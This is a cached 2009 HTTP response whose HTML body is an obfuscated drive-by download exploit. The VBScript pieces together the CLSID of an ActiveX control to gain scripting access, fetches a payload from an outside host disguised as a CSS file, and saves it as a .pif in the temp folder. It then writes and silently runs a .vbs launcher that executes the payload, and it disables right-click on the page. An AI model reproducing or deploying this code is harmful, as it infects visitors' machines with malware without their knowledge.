HTTP/1.1 200 OK
Content-Length: 2726
ETag: "0d119125f92c91:5af"
Date: Mon, 23 Feb 2009 02:18:06 GMT
Last-Modified: Thu, 19 Feb 2009 06:55:38 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://baidu-baiduyi.cn/14.htm
X-Polipo-Date: Mon, 23 Feb 2009 02:39:52 GMT
X-Polipo-Access: Mon, 23 Feb 2009 03:45:10 GMT

<script language=VBScript>
On Error Resume Next
cesemaoid12="29E"
nameeeidx="BD"
cesemaoid5="5A"
cesemaoid2="96"
Set cesemao_2_cn = document.createElement("object")
cesemaoid="clsid:"
cesemaoid3="C5"
cesemao = "http://l.bugxue.com/qwer/ms.css"
cesemaoid11="4FC"
cesemaoid9="3A-0"
cesemaoid8="0-98"
gameid4="56-6"
cesemaoid7="1D"
cesemaoID13="36"
cesemaoid6="3-1"
cesemaoid10="0C0"
dadong="classid"
cesemao5="G"
cesemao3="Micro"
cesemao6="E"
cesemao4="soft.XM"
giceeee="LHTTp"
cesemao7="T":cesemao_2_cn.SetAttribute dadong,  cesemaoid&nameeeidx&cesemaoid2&cesemaoid3&gameid4&cesemaoid5&cesemaoid6&cesemaoid7&cesemaoid8&cesemaoid9&cesemaoid10&cesemaoid11&cesemaoid12&cesemaoID13
qhgfhg="un"
Set lovecesemao=cesemao_2_cn.CreateObject(cesemao3&cesemao4&giceeee,"")
lovecesemao.Open cesemao5&cesemao6&cesemao7, cesemao, False
lovecesemao.Send
cesemao_kiteggggggggg="cesemaoEeee.pif"
cesemao_kitegggggggggs="cesemaoeeee.vbs"
Q123456="Scripting."
Q123456s="FileSyst":Q123456sssx="b.stream"
Q123456sss="Adod":dsasdasd="d"
Q123456ss="emObject"
Q123456sssss=Q123456sss&Q123456sssx
Set chilam = cesemao_2_cn.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
cesemaouser="chilam"
cesemao_kiteggggggggg=chilam.BuildPath(yingying,cesemao_kiteggggggggg)
cesemao_kitegggggggggs=chilam.BuildPath(yingying,cesemao_kitegggggggggs)
Set chilams = cesemao_2_cn.createobject(Q123456sssss,"")
chilams.type=1
chilams.Open
chilams.Write lovecesemao.ResponseBody
</script><script language="JavaScript">
chilams["Savetofile"](cesemao_kiteggggggggg,2);
</script><script language=VBScript>
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText  "'I LOVE cesemao TEAM"&"'I LOVE cesemao TEAM"&vbCrLf&"Set Love_cesemao = CreateObject(""Wscript"&".Shell"")"&"'I LOVE cesemao TEAM"&vBCrLf&"'I LOVE gomeee TEAM"&"'i LOVE gomeee TEAM"&vbCrLf&"Love_cesemao.run ("""&cesemao_kiteggggggggg&""")"&vbCrLf&"'I LOVE cesemao TEAM"&"'I LOVE cesemao TEAM"
chilams.Savetofile cesemao_kitegggggggggs,2
chilams.Close
www="She"
cute="ll.A"
qq="ppl"
cn="ica"
kfqq="tion"
cesemaodk="O"
cesemaodks="p"
cesemaodkss="e"
cesemaodksss="n"
nurewg="cccc"
Set cute_qq_cn_qq_123456 = cesemao_2_cn.createobject(www&cute&qq&cn&kfqq, "")
Set xxxxxxxxxxxxqqqqqqqq = cesemao_2_cn.createobject(www&cute&qq&cn&kfqq, "")
xxxxxxxxxxxxqqqqqqqq.ShellExeCute cesemao_kitegggggggggs, "", "", cesemaodk&cesemaodks&cesemaodkss&cesemaodksss, 0
</script><script type="text/jscript">function init() { document.write("");}window.onload = init;document.write("");</script>
<br><Br><br><br><br><br><br><br>
<body ondragstart="return false" onselectstart="return false" oncontextmenu="return false">